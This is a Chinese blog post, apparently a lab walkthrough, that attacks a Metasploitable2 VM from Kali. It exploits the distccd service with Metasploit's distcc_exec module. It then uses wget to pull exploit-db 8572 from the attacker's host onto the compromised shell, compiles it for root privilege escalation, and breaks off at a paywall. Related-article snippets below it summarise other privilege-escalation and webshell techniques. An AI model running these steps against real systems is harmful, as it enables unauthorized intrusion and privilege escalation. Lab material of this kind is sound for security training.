利用本地漏洞提升权限

最新推荐文章于 2025-04-15 16:26:36 发布
最新推荐文章于 2025-04-15 16:26:36 发布
阅读量634 收藏
点赞数
分类专栏: 渗透测试 文章标签: 提升权限
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41289254/article/details/103430826
版权

环境:
kali:192.168.43.131
metasploitables2:192.168.43.132

利用的是meta2上的distccd服务的漏洞,以下将metaspolitables2简称为tb2

步骤:
1、先用nmap扫一下td2的端口(服务):
nmap -p- 192.168.43.132
2、发现distccd服务,打开msf,搜一下有没有该服务的漏洞利用程序:
msfconsole
search distccd
3、发现有一个:exploit/unix/misc/distcc_exec
use exploit/unix/misc/distcc_exec
show options
set RHOST 192.168.43.132
exploit

4、发现成功进入tb2,看下权限,发现是daemon权限:
whoami
...

5、提权
下载提升权限的exploit:www.exploit-db.com/exploits/8572
下载后将文件放到/var/www/html文件下,开启apache2服务:service apache2 start

先使用之前用msf得到的那个daemon权限的shell,来下载我们的提权exploit:
wget “http://192.168.43.131/8572.c”
然后编译一下:gcc 8572.c -o 8572

看一下exploit需要的参数,发现需要udevd netlink socket的PID,查一下:
ps aux|grep udev

最低0.47元/天 解锁文章
Linux 本地权限提升漏洞
李火火的安全圈
03-30 2222
文章目录前言一、漏洞描述二、漏洞级别三、影响范围四、漏洞细节五、漏洞类型六、本地复现七、修复建议 前言 本文章仅用于漏洞复现和技术研究,切勿非法攻击,出现任何事故与本作者无关,切记! 一、漏洞描述 Linux内核中 net/ipv4/esp4.c 和 net/ipv6/esp6.c中的 IPsec ESP 转换代码中发现堆缓冲区溢出漏洞。该漏洞允许具有正常用户权限本地攻击者覆盖内核中的堆对象,最终获取root权限。 二、漏洞级别 高危 三、影响范围 Linux kernel < 5.17
Kali学习 | 权限提升:5.2 本地权限提升
qq_43233085的博客
01-14 652
Kali学习 | 权限提升:5.2 本地权限提升介绍操作步骤 介绍 上一节介绍了窃取目标系统令牌,现在来介绍窃取令牌后如何提升在目标系统上的权限提升本地权限可以使用户访问目标系统,并且进行其他的操作,如创建用户和组等。 操作步骤 同样的实现本地权限提升,也需要连接到Meterpreter会话,具体操作就不再介绍。 (1)启动Meterpreter会话。执行命令如下所示: msf auxilia...
利用本地漏洞的***
weixin_34185320的博客
08-10 126
1.读取metabase.xml/web.xml /password.properities敏感文件,得知www路径,coldfusion路径,coldfusion后台加密密码 2.本地包含coldfusion日志,写cfm一句话,得到WEBSHELL http://www.ypt.com/index.cfm?action=../../../../../../../....
揭秘本地利用技术:提升权限漏洞发现
最新发布
weixin_35749440的博客
04-15 229
本文详细介绍了本地利用技术在计算机安全领域中的应用,特别是当攻击者有权限访问目标计算机时。通过分析实际案例,我们了解到内存损坏、权限设置不当和逻辑漏洞这三种类型的漏洞,并探讨了如何通过利用这些漏洞提升权限。文章还通过Panda Global Protection产品的具体漏洞来说明本地漏洞的发现和利用过程,包括后门和隐藏功能的利用,以及如何通过静态分析技术发现逻辑错误。此外,文中还揭示了权限错误配置带来的严重安全隐患,并通过实例演示了如何利用这些错误进行权限提升
本地提权
weixin_45605313的博客
06-01 684
本地提权windowSysinternalsSuite->PsExec.exe利用系统命令进程注入pinjector.exe(隐蔽)fgdumpmimikatzwin缓存密码linux脏牛suid/etc/passwd文件的配置不当sudo组 window 常见window权限: 普通用户:user 管理员:administrator 系统:system admin->system SysinternalsSuite->PsExec.exe 微软发布的一套非常强大的免费工具程序集 Ps
提升权限_通过组合漏洞进行权限提升
weixin_30191947的博客
01-12 516
介绍这篇文章主要讲述了由NCC Group研究人员所发现的两个通过COM本地服务进行非法提权的漏洞。第一个漏洞CVE-2019-1405是COM服务中的一个逻辑错误,可让本地普通用户以LOCAL SERVICE身份执行任意命令。第二个漏洞CVE-2019-1322是一个简单的服务配置错误,可让本地SERVICE组中的任何用户重新配置以SYSTEM权限运行的服务(此漏洞也被其他研究人员发现)。当以上...
权限提升
sunxingstar的博客
08-24 949
常见的提权的种类 • 操作系统本身的提权 • 利用数据库进行提权 • 文件系统配置不当进行提权 • 利用第三方的软件进行提权 系统漏洞提权 windows本地溢出提权 • systeminfo查看补丁修复情况 • 查找可写目录(目录执行权限) • 上传cmd命令程序(当前用户权限) • 上传本地提权程序 • 调用cmd执行提权程序 • whoami确认获取系统权限 ms09-012 KB9...
本地权限提升漏洞分析
若有战,召必回
11-14 1666
应用程序作者提供一个 .msi 文件,该文件是一个数据库,定义安装应用程序时必须进行的更改:要创建的文件夹、要复制的文件、要修改的注册表项、要执行的自定义操作。如果需要回滚不完整的安装,该服务将读取 .rbs 和 .rbf 文件,并使用它们将系统恢复到安装之前存在的状态。本文在任意文件删除的基础上进行了本地提权,这个漏洞发现的难点我感觉在于如何清空需要转换为连接点的目录这个地方,在CVE-2024-27460中的目录(不光光是此漏洞)使用的是低权限创建的文件内容,所以我们可以直接对此进行清空。
Linux polkit本地权限提升漏洞和libpcap抓包实时监控tcpdump
04-26
个人使用,适合centos7以上版本的linux系统
MacOS本地权限提升漏洞详情解析与利用方法
然而,CVE-2020–9854这个漏洞使得攻击者可以利用系统中存在的某项技术缺陷,从一个普通用户进程提升权限到内核级别。 在描述中提到的博客文章,作者详细介绍了他使用的漏洞利用方法。这种方式的攻击,通常称为...
CVE-2021-33909:Linux本地权限提升漏洞
HBohan的博客
07-22 1260
Linux本地权限提升漏洞影响大多数Linux发行版。 漏洞概述 Qualys研究人员在Linux kernel中发现一个本地权限提升漏洞——Sequoia,该漏洞是Linux kernel文件系统层中的size_t-to-int 类型转化漏洞漏洞CVE编号为CVE-2021-33909,攻击者利用漏洞可以在大多数Linux发行版上获得root权限。 Linux文件系统 Linux文件系统是存储设备上数据和元数据的组织形式,控制着数据的存储、提取,其最重要的功能是管理用户数据。Linux文件系统接口.
Linux Polkit 权限提升漏洞解决方案
bocco的博客
01-28 3119
近日,安全狗应急响应中心监测 Linux Polkit 被披露出存在权限提升漏洞漏洞编号CVE-2021-4034。可导致恶意用户权限提升等危害。
漏洞利用与提权(一):提权基础
黎先生的博客
02-15 4974
1. 提权概述 1.1 概述 提权顾名思义就是提高自己在系统中的权利。渗透测试以获取系统的最高权限为目标,首先通过寻找漏洞,获取WebShell权限,然后进行提权。 提权可分为: 操作系统提权 Windows Linux Samba Android 应用程序提权 Seru-u Radmin SQL Server 2000/2005、MySQL、Oracle Java IE 例如Wi...
Metasploit的本地漏洞利用
xxx9686的博客
09-17 238
这个很简单的理解,本地例如: RAR ZIP 播放器等等,当我们用MSF生成漏洞文件后,别人用特定的工具打开,就会中马。当别人用eZip Wizard 3.0打开以后 就会中我们的PAYLOAD 后门。打开UB 1 ,我们来利用ZIP吧,启动METASPLOIT 搜索rar。
提升权限_Win 10计划任务本地权限提升0 day POC
weixin_39879522的博客
01-12 182
漏洞利用是自去年8月起安全研究人员SandboxEscaper发现的第5个Windows 漏洞利用。SandboxEscaper利用漏洞利用可以进行本地权限提升,获取SYSTEM和TrustedInstaller等特权用户对温泉的完全控制权限。 定时任务文件这次,SandboxEscaper关注的还是计划任务工具(Task Scheduler),并用它来从其他系统中导入遗留任务。在W...
权限提升(SET)
qq_44111753的博客
12-13 528
1、使用假冒令牌 1)、启动meterpreter会话,执行命令 sessions -i 1 2)、use incognito加载incognito模块,然后列举出令牌 3)、help查看帮助信息,了解列举令牌的命令 4)、list_tokens -u 列举出所有的令牌 5)、impersonate_token命令假冒用户进行攻击 impersonate_token user 2、本地权限提升 1)、启动meterpreter会话 sessions -i 1 2)、使用getsystem命令提升本地权限
「 典型安全漏洞系列 」09.权限提升漏洞详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
04-06 2874
权限提升漏洞是一种常见的安全漏洞,它允许攻击者利用系统或应用程序中的漏洞,获取原本不具有的更高权限,从而进行恶意行为。这种漏洞通常发生在用户输入、身份验证、访问控制等方面存在缺陷,导致攻击者能够绕过预期的权限限制,获取更多的系统资源或执行更高权限的操作。访问控制是按用户身份及其所属的某项定义组来限制用户访问某些信息或功能的一种技术。在web应用程序的上下文中,访问控制依赖于身份验证和会话管理。
Linux polkit本地权限提升漏洞
刘杨造梦的博客
05-01 386
漏洞描述 在 polkit 的 pkexec 程序中发现了一个本地权限提升漏洞。pkexec 应用程序是一个 setuid 工具,旨在允许非特权用户根据预定义的策略以特权用户身份运行命令。由于当前版本的 pkexec 无法正确处理调用参数计数,并最终会尝试将环境变量作为命令执行。攻击者可以通过控制环境变量,从而诱导 pkexec 执行任意代码。利用成功后,可导致非特权用户获得管理员权限。CVE-2021-4034 polkit 的 pkexec 存在本地权限提升漏洞,已获得普通权限的攻击者可通过此漏洞
五种利用本地包含漏洞的方式
weixin_33694172的博客
09-25 1057
本文讲的是五种利用本地包含漏洞的方式,本地文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include fuction.php?>就可以调用内部定义的函数。 本...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值